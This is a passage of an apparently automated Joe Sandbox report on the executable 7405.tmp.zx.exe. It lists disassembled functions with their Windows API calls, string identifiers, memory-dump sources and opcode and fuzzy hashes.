                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateDirectory
                                                                                                                                                                                                                                                    • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                    • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                    • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                                                    • Instruction ID: 3682c80c1ebe837a95abe7f78ad86f1cc2bb5e94177cdf40eb45dddec2c1b1bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31F621A19AC646EA319B24E8107FA6354FF44BE4F454274EE7D8B7C9DF3CDA058740
                                                                                                                                                                                                                                                    Function 00007FF69F3E2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                                                    • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                                                    • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                                                    • Instruction ID: 37854bfd0088aaab217114c44382b5f46ce34d2e623b08bd42f334d1c6a0f252
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF11BF72A28B8582FB308B10F451BA93364FF54B84F915179EA8CCB645CF7CDA14C740
                                                                                                                                                                                                                                                    Function 00007FF69F3E25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                                    • API String ID: 1878133881-653037927
                                                                                                                                                                                                                                                    • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                                                    • Instruction ID: 3148b2ffd4e766658ada761fdfd945c210b06ece7d47760151c2e115f44dfef6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF11BF72A28B8582FB308B00F451BA93364FF44B84F921179DA4C8B645CF7CDA05C740
                                                                                                                                                                                                                                                    Function 00007FF69F3FB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                                                    • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                                                    • Instruction ID: b6a8e57873589f55a3de2929cb63da546729f55678b60ef07a78201ec761dad9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26D106B2B08A8289F760CF75D4402AD3BB5FB44B98B154279CE5E9BB99DE3CD406D340
                                                                                                                                                                                                                                                    Function 00007FF69F3FEC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4170891091-0
                                                                                                                                                                                                                                                    • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                                                    • Instruction ID: 06f957a763f7d3b16bee5da00a548ea40ca1647528f7875be365875173208f30
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D510572F042118AFB74DF64E9416BC37A1EB24358F160179DD1E9ABE5DF3CA5818780
                                                                                                                                                                                                                                                    Function 00007FF69F3F4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2780335769-0
                                                                                                                                                                                                                                                    • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                                                    • Instruction ID: fc8df68b7f89c7339eb657fc717001496d30c24511a85966603ae865ecd39211
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E519D22A086418AFBA4DF72D4403BD37A1EB58B58F269179DE49CB789DF3CD4819780
                                                                                                                                                                                                                                                    Function 00007FF69F3E2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1956198572-0
                                                                                                                                                                                                                                                    • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                                                    • Instruction ID: bfbdbbc9d4ab692ed76af9eb2bb291a86920422939e64171357f36feeb64f8f0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1011E531E0814683FB649B6AE5442B91391EF98B80F9A8075DA498BBCECD7CDCC58744
                                                                                                                                                                                                                                                    Function 00007FF69F3EC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                    • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                                                    • Instruction ID: e9a5982cd9d510fda2560bce82ff4587af000ef3e1384034dd27f3fcb4ef720f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D117026B14F068AEB10CF60E8442BC33A4FB69B58F050E35DA2DC67A5DF7CE1648340
                                                                                                                                                                                                                                                    Function 00007FF69F404E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                    • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                                                    • Instruction ID: 4f43f7143aeb66fd9ec89d0d336aabb6d88d9cd912fab9abcddfd6fc98055268
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62414C12A1838246FB749B25D4017796760EFA0FA4F294279EE5C87AE6DF7CD441C780
                                                                                                                                                                                                                                                    Function 00007FF69F3F832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F3F835E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: GetLastError.KERNEL32(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C78
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69F3EBEC5), ref: 00007FF69F3F837C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                    • API String ID: 3580290477-3805284766
                                                                                                                                                                                                                                                    • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                                                    • Instruction ID: 1095fcee94e952ab84752729ea3c2970094792353764ea983966f072e83b9e3d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5341C236A08B4286F7B8DF25D9400BC33A4EB45B90B574179EA0DCBB96CE3DE4919380
                                                                                                                                                                                                                                                    Function 00007FF69F3FF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: .$:
                                                                                                                                                                                                                                                    • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                                                    • Opcode ID: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                                                                                                                                                                                                                    • Instruction ID: 8071664858a4f6ff452818ad7c9955fb15a91f1a32f361389fb94acade2ac4b8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7e7ecf8ca197d948e5de4d949c192756b769c590a90378fa45037ccdac380fb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93418D22F18B5298FBA09BB1D8501BD27B4EF14758F56017DDE4DABA89DF3C9442A380
                                                                                                                                                                                                                                                    Function 00007FF69F3FBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                    • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                    • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                                                    • Instruction ID: 5c44c6a1bfd6066a6f6fdc92f3a249387fcb0fbec42400114cae1035524365a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B41C172A18A8282EB608F25E4443A97760FB98BD4F954135EE4DCB788DF3CD541DB40
                                                                                                                                                                                                                                                    Function 00007FF69F3FE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                                    • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                    • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                                                                                                                                    • Instruction ID: 58c5cba59ce52292cc493987d29b3ccfcd2e4b832580d60ee87a4ded2e257eb3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D721E632B08681C2FBB09B15D04427E73B1FB98B84F864079DA8D87285CF7CE984C791
                                                                                                                                                                                                                                                    Function 00007FF69F3EF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                                                    • Instruction ID: 83fe39f3c95c50ab4e31985746f645d6f0ae28387d3edcd41f6a1baaf57900f1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0115B36618B8582EB218F25F440269B7E0FF88B94F198274DB8D8B769DF7DC9518B40
